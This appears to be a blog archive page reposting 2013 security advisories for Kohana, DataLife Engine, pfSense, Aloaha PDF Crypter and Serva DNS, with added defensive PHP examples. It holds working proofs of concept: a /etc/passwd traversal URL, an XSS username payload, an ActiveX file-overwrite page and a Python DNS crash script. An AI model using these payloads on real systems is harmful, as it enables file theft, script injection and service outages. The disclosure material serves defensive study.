Archive for 29 January 2013

Kohana Framework v2.3.3 Directory Traversal Vulnerability

The details of the Kohana Framework v2.3.3 Directory Traversal vulnerability are as follows:

Title:
======
Kohana Framework v2.3.3 - Directory Traversal Vulnerability


Date:
=====
2013-01-27


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=841


VL-ID:
=====
837


Common Vulnerability Scoring System:
====================================
7.1


Introduction:
=============
Kohana is an open source, object oriented MVC web framework built using PHP5 by a team of volunteers that aims to be 
swift, secure, and small. (copy from vendor website) This is an OOP framework that is extremely DRY. Everything is built 
using strict PHP 5 classes and objects. Many common components are included: translation tools, database access, code 
profiling, encryption, validation, and more.

Extending existing components and adding new libraries is very easy. Uses the BSD license, so you can use and modify it for 
commercial purposes. Benchmarking a framework is hard and rarely reflects the real world, but Kohana is very efficient and 
carefully optimized for real world usage. Very well commented code and a simple routing structure makes it easy to understand 
what is happening. Simple and effective tools help identify and solve performance issues quickly.

(Copy of the Vendor Homepage: http://kohanaframework.org/ )



Abstract:
=========
The Vulnerability Laboratory Research Team discovered a Directory Traversal web vulnerability in the Kohana v2.3.3 Content Management System.


Report-Timeline:
================
2013-01-27:	Public Disclosure


Status:
========
Published


Affected Products:
==================
Kohana
Product: Framework - Content Management System 2.3.3


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A Directory Traversal web vulnerability is detected in the Kohana Content Management System web application.
The vulnerability allows remote attackers to request local directories and files of the web server application system.

The vulnerability is located in the `master/classes/Kohana/Filebrowser.php` file in line 90 when processing to request 
the path dir via replace. The filter replaces `../` by null and it applies on file reading requests. 

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
    ->uri(array(
        'action' => 'thumb',
        'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
    ));

Remote attackers can bypass the validation with the vulnerable replace function in the file browser to read local 
web server files via directory (path) traversal attack.

Exploitation of the vulnerability requires no privileged application user account and no user interaction.
Successful exploitation of the vulnerability results in reading arbitrary system files, compromising the web server.

Vulnerable Module(s):
				[+] Filebrowser

Vulnerable Function(s):
				[+] str_replace > dir

Vulnerable Parameter(s): 
				[+] ?path

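A containment check that does not rely on stripping substrings from the requested path, added here as an example and not Kohana's code. It assumes $requested is the already-decoded query parameter and resolve_within_base() is a hypothetical helper name; the canonical path is compared against the base directory, so a request that resolves outside it is rejected whatever it looked like on the wire.

```php
<?php
// Added example, not Kohana's code: confine a user-supplied "path" parameter to a
// fixed base directory by comparing canonical paths, instead of stripping "../"
// substrings. Assumes $requested is the already-decoded query parameter.
// resolve_within_base() is a hypothetical helper name.

function resolve_within_base(string $baseDir, string $requested): ?string
{
    $base = realpath($baseDir);            // canonical base; false if it does not exist
    if ($base === false || strpos($requested, "\0") !== false) {
        return null;                       // missing base or NUL byte in the request
    }
    // Resolve ".", ".." and symlinks against the real filesystem.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false) {
        return null;                       // no such file, or realpath refused it
    }
    // Accept only the base itself or a path strictly beneath it.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $base && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // canonical path escaped the base: traversal
    }
    return $candidate;
}

// Constructed demonstration tree under the system temp directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fb_demo_' . getmypid();
mkdir("$root/graphics/sub", 0700, true);
touch("$root/graphics/sub/photo.jpg");

$cases = [
    'sub/photo.jpg',                        // legitimate file inside the base
    'sub/../../graphics/sub/photo.jpg',     // ".." that still ends inside the base
    '../../../../../../../../etc/passwd',   // the advisory's traversal, decoded
];
foreach ($cases as $c) {
    $r = resolve_within_base("$root/graphics", $c);
    printf("%-40s => %s\n", $c, $r === null ? 'rejected' : $r);
}

unlink("$root/graphics/sub/photo.jpg");
rmdir("$root/graphics/sub"); rmdir("$root/graphics"); rmdir($root);
```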

Proof of Concept:
=================
The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction.
For demonstration or to reproduce ...

Review: Kohana/Filebrowser.php

$thumb = Route::get('wysiwyg/filebrowser')
    ->uri(array(
        'action' => 'thumb',
        'path'   => str_replace(array($dir, DIRECTORY_SEPARATOR), array('', '/'), $filename)
    ));


Review: GET Request
GET http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..
%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 
HTTP/1.0
Host: media.[server].com
User-Agent: Kami VL


PoC: 
http://media.[server].com/directory/graphics/?path=..%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F..%2F..%2F%2F%2Fetc%2Fpasswd 


Risk:
=====
The security risk of the directory traversal web vulnerability is estimated as high(+).
 


Credits:
========
Vulnerability Laboratory [Research Team]  - Karim B. (kami@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory

-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com


DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability

The exploit and details for the DataLife Engine 9.7 (preview.php) PHP Code Injection vulnerability are as follows.

------------------------------------------------------------------
DataLife Engine 9.7 (preview.php) PHP Code Injection Vulnerability
------------------------------------------------------------------

[-] Software Link:

http://dleviet.com/


[-] Affected Version:

9.7 only.


[-] Vulnerability Description:

The vulnerable code is located in the /engine/preview.php script:

246.	$c_list = implode (',', $_REQUEST['catlist']);
247.
248.	if( strpos( $tpl->copy_template, "[catlist=" ) !== false ) {
249.		$tpl->copy_template = preg_replace( "#\\[catlist=(.+?)\\](.*?)\\[/catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}')", $tpl->copy_template );
250.	}
251.		
252.	if( strpos( $tpl->copy_template, "[not-catlist=" ) !== false ) {
253.		$tpl->copy_template = preg_replace( "#\\[not-catlist=(.+?)\\](.*?)\\[/not-catlist\\]#ies", "check_category('\\1', '\\2', '{$c_list}', false)", $tpl->copy_template );
254.	}

User supplied input passed through the $_REQUEST['catlist'] parameter is not properly
sanitized before being used in a preg_replace() call with the e modifier at lines 249 and 253.
This can be exploited to inject and execute arbitrary PHP code. Successful exploitation of
this vulnerability requires a template which contains a “catlist” (or a “not-catlist”) tag.

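The same catlist expansion written with preg_replace_callback() instead of the e modifier, added here as an example and not DataLife Engine's code. check_category() is a stand-in with assumed semantics (match on any shared category), and $c_list stands for the request value the original script builds with implode().

```php
<?php
// Added example, not DataLife Engine's code: the [catlist=...]...[/catlist] expansion
// from preview.php rewritten without the /e modifier. With /e, the replacement string
// is evaluated as PHP, so the interpolated $c_list becomes code; with a callback the
// captured groups and $c_list reach check_category() only as string arguments.
// check_category() is a stand-in with assumed semantics (match on any shared category).

function check_category(string $allowed, string $body, string $current, bool $positive = true): string
{
    $shared = array_intersect(explode(',', $allowed), explode(',', $current));
    return ((count($shared) > 0) === $positive) ? $body : '';
}

function expand_catlist(string $tpl, string $c_list): string
{
    // Same patterns as the vulnerable lines 249 and 253, minus the "e" flag.
    $tpl = preg_replace_callback(
        '#\[catlist=(.+?)\](.*?)\[/catlist\]#is',
        function (array $m) use ($c_list): string {
            return check_category($m[1], $m[2], $c_list);
        },
        $tpl
    );
    return preg_replace_callback(
        '#\[not-catlist=(.+?)\](.*?)\[/not-catlist\]#is',
        function (array $m) use ($c_list): string {
            return check_category($m[1], $m[2], $c_list, false);
        },
        $tpl
    );
}

// Constructed template and two request values. $c_list stands for the result of
// implode(',', $_REQUEST['catlist']) in the original script.
$template = '[catlist=1,2]visible for 1 or 2[/catlist]'
          . '[not-catlist=1,2]visible for other categories[/not-catlist]';

echo expand_catlist($template, '2'), "\n";            // takes the catlist branch
echo expand_catlist($template, "2', 'x"), "\n";       // quotes stay data, never code
```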

[-] Solution:

Apply the vendor patch: http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html


[-] Disclosure Timeline:

[16/01/2013] - Vendor notified
[19/01/2013] - Vendor patch released
[20/01/2013] - CVE number requested
[21/01/2013] - CVE number assigned
[28/01/2013] - Public disclosure


[-] CVE Reference:

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2013-1412 to this vulnerability.


[-] Credits:

Vulnerability discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2013-01

PFsense UTM Platform 2.0.1 XSS Vulnerability

An XSS vulnerability has been found in the PFsense UTM Platform 2.0.1; the discoverer's description of the vulnerability and of how it is used are as follows.

┴┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┬┴
 │ Exploit Title: pfSense <= 2.0.1 XSS & CSRF during IPSec XAuth authentication
 │ Date: 04/01/2013
 │ Author: Dimitris Strevinas
 │ Vendor or Software Link: www.pfsense.org
 │ Version: <= 2.0.1
 │ Category: Semi-Persistent XSS & CSRF
 │ Google dork:
 │ Tested on: FreeBSD
┬┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┴┬
 
 
 pfSense UTM distribution description
┌────────────────────────────────────┘
 pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations protecting thousands of network devices. 
 This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however it is not our primary focus. 
 [source: www.pfsense.org]
 The IPSec VPN functionality on pfSense is implemented using the Racoon vpn concentrator software.
 
 
 Vulnerability Summary
┌──────────────────────┘
 pfSense versions 2.0.1 and prior are vulnerable to semi-persistent XSS and CSRF attack vectors, exploited by sending Javascript/HTML code as a username during the XAuth user authentication phase. 
 XAUTH provides extended authentication for IPSec telecommuters by using authentication schemes such as RADIUS or internal user databases. [source: www.ciscopress.org]
 The vulnerability lies in diag_logs_ipsec.php which does not properly escape HTML characters in the Racoon log files.
 It is assumed that the attacker has successfully completed IPSEC Phase 1 and Phase 2 based on one of the following schemes:
	. Mutual RSA
	. Mutual PSK
	. Hybrid RSA
 It should also be noted that newer pfSense versions use CSRF-magic on the majority of Web GUI forms, thus the CSRF exploitation likelihood is minimized, at least in the standard installation.


 Exploit Path 
┌─────────────┘
 1) Perform the Phase 1 and Phase 2 using a VPN Client and known credentials/certificates
 2) During the XAuth provide a username like "><script>alert("XSS")</script> and a random password
 3) The reflection of the XSS/CSRF is in the logs under Status > System Logs > IPSec
 The XSS "time-to-live" depends on the Racoon logging verbosity, max number of log lines and vpn activity. Nevertheless, it can be resubmitted to be shown again on top.

 
 Solution
┌─────────┘
 Patch available by vendor, streamlined to 2.1
 URL: http://redmine.pfsense.org/projects/pfsense-tools/repository/revisions/0675bde3039a94ee2cadc360875095b797af018f


 Credits & Contact
┌──────────────────┘
 Dimitris Strevinas
 Obrela Security Industries
 CONTACT: www.obrela.com
 

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite

Aloaha PDF Crypter (3.5.0.1164) ActiveX Arbitrary File Overwrite dos exploit

============================================================================================
TITLE:
============================================================================================
Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite
 
url: http://www.aloaha.com/
download: http://www.aloaha.com/download/aloaha_crypter.zip
author: shinnai (http://shinnai.altervista.org)
============================================================================================
FILE INFO:
============================================================================================
File: C:\WINDOWS\system32\vbCrypt.dll
InternalName: ebCrypt
OriginalFilename: ebCrypt.DLL
FileVersion: 2.0.0.2087
FileDescription: ebCrypt Main Module
Product: ebCrypt
ProductVersion: 2.0.0.2087
Language: English (United States)
MD5 hash: b262cb93c555c3c9604502d071a783ec
============================================================================================
ACTIVEX INFO:
============================================================================================
ProgID: EbCrypt.eb_c_PRNGenerator.1
GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C}
Description: eb_c_PRNGenerator Class
Safety report:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
============================================================================================
BUG:
============================================================================================
This ActiveX contains the "SaveToFile" method, which could be used to overwrite arbitrary files on
users' PCs.
============================================================================================
PROOF OF CONCEPT
============================================================================================
<html>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object>
<script language='vbscript'>
test.SaveToFile "c:\windows\_system.ini"
</script>
</html>
============================================================================================

Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability


#!/usr/bin/python
 
# Exploit Title: Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability
# Version:       v2.0.0
# Date:          2013-01-14
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      www.inshell.net
# Software Link: http://www.vercot.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         Malformed QueryName causes the crash
# Howto:         -
 
import socket
 
target="192.168.0.1"
port=53
 
TransACTID="\x03\xc3"
Flags="\x01\x00"
QuestionRRC="\x00\x01"
AnswerRRC="\x00\x00"
AuthRRC="\x00\x00"
AddRRC="\x00\x00"
QueryName="\xFF\x69\x6e\x73\x68\x65\x6c\x6c\x03\x6e\x65\x74\x00" #vulnerable: first length-byte
QueryType="\x00\x01"
QueryClass="\x00\x01"
payload = TransACTID + Flags + QuestionRRC + AnswerRRC +  AuthRRC + AddRRC + QueryName + QueryType + QueryClass
 
print "[*] Connecting to Target " + target + "..."
 
s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0) #udp
 
print "[*] Sending malformed request..."
 
s.sendto(payload,(target,port))
 
print "[!] Exploit has been sent!\n"
s.close()
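The defensive counterpart to the malformed QueryName above, added here as an example and not Serva's code or part of the PoC: a bounds-checked parser for the QNAME field of a DNS question that rejects an illegal length byte such as the 0xFF in the script instead of trusting it. parse_qname() is a hypothetical helper name; the packets are constructed from the field values the script uses.

```php
<?php
// Added example, not Serva's code: a bounds-checked parser for the QNAME field of a
// DNS question, the field the script above malforms. Each label starts with a
// length byte that must be 1..63 and must not run past the end of the packet;
// values >= 0xC0 (compression pointers) are not accepted in a query name here.
// Returns the decoded name plus the offset of QTYPE, or null when malformed.

function parse_qname(string $packet, int $offset): ?array
{
    $labels = [];
    $total  = 0;
    $len    = strlen($packet);
    while (true) {
        if ($offset >= $len) {
            return null;                   // ran off the end before the root label
        }
        $l = ord($packet[$offset]);
        $offset++;
        if ($l === 0) {
            break;                         // root label terminates the name
        }
        if ($l > 63) {
            return null;                   // pointer or an illegal length such as 0xFF
        }
        if ($offset + $l > $len) {
            return null;                   // label claims more bytes than remain
        }
        $total += $l + 1;
        if ($total > 255) {
            return null;                   // RFC 1035 limit on total name length
        }
        $labels[] = substr($packet, $offset, $l);
        $offset  += $l;
    }
    return ['name' => implode('.', $labels), 'next' => $offset];
}

// Constructed packets: the 12-byte header from the script, then the question section.
$header = "\x03\xc3\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00";
$good   = $header . "\x07inshell\x03net\x00\x00\x01\x00\x01";
$bad    = $header . "\xFFinshell\x03net\x00\x00\x01\x00\x01";   // first length byte 0xFF, as in the PoC

var_dump(parse_qname($good, 12));   // decoded name and the offset where QTYPE starts
var_dump(parse_qname($bad, 12));    // rejected as malformed instead of being trusted
```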